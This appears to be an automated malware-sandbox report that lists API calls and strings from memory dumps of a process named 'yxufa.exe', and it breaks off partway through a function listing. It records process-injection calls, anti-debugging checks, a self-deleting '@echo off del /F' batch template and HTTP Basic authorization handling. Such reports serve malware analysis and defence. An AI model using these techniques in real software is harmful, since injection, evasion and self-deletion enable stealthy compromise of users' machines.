Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

Part of subcall function 00FD692C: EnterCriticalSection.KERNEL32(01003510,00000024,00FD699F,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD693C
Part of subcall function 00FD692C: LeaveCriticalSection.KERNEL32(01003510,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD6966

HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE7011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(01002FD8), ref: 00FE702B
GetNativeSystemInfo.KERNEL32(?), ref: 00FE7167
memset.MSVCRT ref: 00FE719C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C47011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(00C62FD8), ref: 00C4702B
GetNativeSystemInfo.KERNEL32(?), ref: 00C47167
memset.MSVCRT ref: 00C4719C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDE4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FDE4E9

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Part of subcall function 00FDE22A: PathFindFileNameW.SHLWAPI(?), ref: 00FDE22E
Part of subcall function 00FDE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00FDE242
Part of subcall function 00FDE22A: CharUpperW.USER32(?,?,?,00FDE32B), ref: 00FDE24C

Part of subcall function 00FE100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00FE103A

Sleep.KERNEL32(000001F4), ref: 00FDE57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FDE50A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3E4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E4E9

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C3E22A: PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
Part of subcall function 00C3E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
Part of subcall function 00C3E22A: CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

Part of subcall function 00C4100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00C4103A

Sleep.KERNEL32(000001F4), ref: 00C3E57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C3E50A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351ED9F, Relevance: 5.5, APIs: 3, Instructions: 75

APIs

IsDebuggerPresent.KERNEL32 ref: 0351EE89
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0351EE93
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0351EEA0

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FC9A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 00FC99B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00FC99CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00FC9ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00FC9AEF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C29A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 00C299B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00C299CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00C44188

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00C441C7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C441EE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE5594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 00FF537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 00FF53E5
Part of subcall function 00FF537E: memset.MSVCRT ref: 00FF53FB

GetSystemTime.KERNEL32(?), ref: 00FE55BA

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

Sleep.KERNEL32(000005DC), ref: 00FE55D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00FE55DC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C45594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 00C5537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 00C553E5
Part of subcall function 00C5537E: memset.MSVCRT ref: 00C553FB

GetSystemTime.KERNEL32(?), ref: 00C455BA

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Sleep.KERNEL32(000005DC), ref: 00C455D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00C455DC

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE589C, Relevance: 5.5, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(01003510,?,00000001,?,?,00FE5AB4,?,?,?,00000001), ref: 00FE58B8
LeaveCriticalSection.KERNEL32(01003510,?,?,00FE5AB4,?,?,?,00000001), ref: 00FE58DF

Part of subcall function 00FE575A: memset.MSVCRT ref: 00FE5774
Part of subcall function 00FE575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE57BA

Part of subcall function 00FC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00FC9ACA
Part of subcall function 00FC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00FC9AEF

Part of subcall function 00FC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00FC9B41

_ultow.MSVCRT ref: 00FE5926

Part of subcall function 00FC9A2A: CryptDestroyHash.ADVAPI32 ref: 00FC9A42
Part of subcall function 00FC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FC9A53

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD8162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(01111FCC,00FD8636,?,?,?,?,01111FC0,?), ref: 00FD816B
TlsGetValue.KERNEL32(?,00000001,01111FCC), ref: 00FD817D
TlsSetValue.KERNEL32(?,?), ref: 00FD81C2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD1AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00FD1ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FD1AED
CloseHandle.KERNEL32 ref: 00FD1AFA

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C38162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(0000000C,00C38636,?,?,?,?,00000000,?), ref: 00C3816B
TlsGetValue.KERNEL32(?,00000001,0000000C), ref: 00C3817D
TlsSetValue.KERNEL32(?,?), ref: 00C381C2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C31ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C31AED
CloseHandle.KERNEL32 ref: 00C31AFA

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C306B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 00C306CE
InterlockedCompareExchange.KERNEL32(00C6276C), ref: 00C306DA
VirtualProtect.KERNEL32(00000000,00010000,00000040,?), ref: 00C3071E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDDCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00FDDD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00FDDD24
CloseHandle.KERNEL32 ref: 00FDDD37

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3DCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C3DD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00C3DD24
CloseHandle.KERNEL32 ref: 00C3DD37

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF3CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00FF3D14
lstrcmpA.KERNEL32(Basic ,?,00FE01C0,00000006,Authorization,?,?,?), ref: 00FF3D1E

Strings

Basic , xrefs: 00FF3D13 00FF3D1D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C53CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00C53D14
lstrcmpA.KERNEL32(Basic ,?,00C401C0,00000006,Authorization,?,?,?), ref: 00C53D1E

Strings

Basic , xrefs: 00C53D13 00C53D1D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00FD5639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00FD1992,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD5642
InitializeCriticalSection.KERNEL32(010027DC), ref: 00FD5652

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00C35639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C35642
InitializeCriticalSection.KERNEL32(00C627DC), ref: 00C35652

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDDCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 00FDDCC4
CloseHandle.KERNEL32 ref: 00FDDCD7
CloseHandle.KERNEL32 ref: 00FDDCED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3DCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 00C3DCC4
CloseHandle.KERNEL32 ref: 00C3DCD7
CloseHandle.KERNEL32 ref: 00C3DCED

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(010030F4), ref: 00FF0437
QueryPerformanceCounter.KERNEL32(?), ref: 00FF0441
GetTickCount.KERNEL32 ref: 00FF044B

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C5042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(00C630F4), ref: 00C50437
QueryPerformanceCounter.KERNEL32(?), ref: 00C50441
GetTickCount.KERNEL32 ref: 00C5044B

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E267, Relevance: 5.4, APIs: 3, Instructions: 16

APIs

TlsGetValue.KERNEL32(?,0351E3A3), ref: 0351E270
DecodePointer.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E282
TlsSetValue.KERNEL32 ref: 0351E291

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FF3C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00FF3C98
StrCmpIW.SHLWAPI(?,?), ref: 00FF3CA2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C53C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD69B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 00FD692C: EnterCriticalSection.KERNEL32(01003510,00000024,00FD699F,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD693C
Part of subcall function 00FD692C: LeaveCriticalSection.KERNEL32(01003510,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD6966

HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C369B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE2866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

memcpy.MSVCRT ref: 00FE29C9
memcpy.MSVCRT ref: 00FE29DC
memcpy.MSVCRT ref: 00FE29FD

Part of subcall function 00FE65F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00FE675C

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

memcpy.MSVCRT ref: 00FE2A6F

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD6A7D: memcpy.MSVCRT ref: 00FD6A9C

Part of subcall function 00FE23E2: memmove.MSVCRT ref: 00FE2653
Part of subcall function 00FE23E2: memcpy.MSVCRT ref: 00FE2662

Part of subcall function 00FE26D6: memcpy.MSVCRT ref: 00FE274B
Part of subcall function 00FE26D6: memmove.MSVCRT ref: 00FE2811
Part of subcall function 00FE26D6: memcpy.MSVCRT ref: 00FE2820

Part of subcall function 00FDE61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 00FDE688

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C42866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C429C9
memcpy.MSVCRT ref: 00C429DC
memcpy.MSVCRT ref: 00C429FD

Part of subcall function 00C465F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00C4675C

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C42A6F

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

Part of subcall function 00C423E2: memmove.MSVCRT ref: 00C42653
Part of subcall function 00C423E2: memcpy.MSVCRT ref: 00C42662

Part of subcall function 00C426D6: memcpy.MSVCRT ref: 00C4274B
Part of subcall function 00C426D6: memmove.MSVCRT ref: 00C42811
Part of subcall function 00C426D6: memcpy.MSVCRT ref: 00C42820

Part of subcall function 00C3E61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 00C3E688

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD69C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?), ref: 00FD6A06

Part of subcall function 00FD692C: EnterCriticalSection.KERNEL32(01003510,00000024,00FD699F,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD693C
Part of subcall function 00FD692C: LeaveCriticalSection.KERNEL32(01003510,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD6966

HeapAlloc.KERNEL32(00000000,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?,?,?), ref: 00FD69F3

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C369C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 00C502BE: EnterCriticalSection.KERNEL32(00C63510,?,00C50474,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C502CE
Part of subcall function 00C502BE: LeaveCriticalSection.KERNEL32(00C63510,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C502F8

EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCE826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
DeleteFileW.KERNEL32(?), ref: 00FCE836

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2E826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD2FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00FD2FBB
CloseHandle.KERNEL32 ref: 00FD2FC2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C32FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00C32FBB
CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCD7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 00FCD810
EnterCriticalSection.KERNEL32 ref: 00FCD82D
memcpy.MSVCRT ref: 00FCD878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 00FCD892

Part of subcall function 00FCD6C8: EnterCriticalSection.KERNEL32(?,?,?,?,00FCD979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00FCD6D2
Part of subcall function 00FCD6C8: memcpy.MSVCRT ref: 00FCD74E
Part of subcall function 00FCD6C8: memcpy.MSVCRT ref: 00FCD762
Part of subcall function 00FCD6C8: memcpy.MSVCRT ref: 00FCD78C
Part of subcall function 00FCD6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00FCD979,00000001,?,00000000,?,?,?,00000000), ref: 00FCD7B2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2D7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 00C2D810
EnterCriticalSection.KERNEL32 ref: 00C2D82D
memcpy.MSVCRT ref: 00C2D878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 00C2D892

Part of subcall function 00C2D6C8: EnterCriticalSection.KERNEL32(?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00C2D6D2
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D74E
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D762
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D78C
Part of subcall function 00C2D6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000), ref: 00C2D7B2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Analysis Process: yxufa.exe PID: 908 Parent PID: 1632

Executed Functions

Function 0351C52C, Relevance: 48.0, APIs: 11, Strings: 16, Instructions: 776

APIs

GetColorDirectoryW.MSCMS(00000000,?,?), ref: 0351C550
GetLastError.KERNEL32 ref: 0351C593
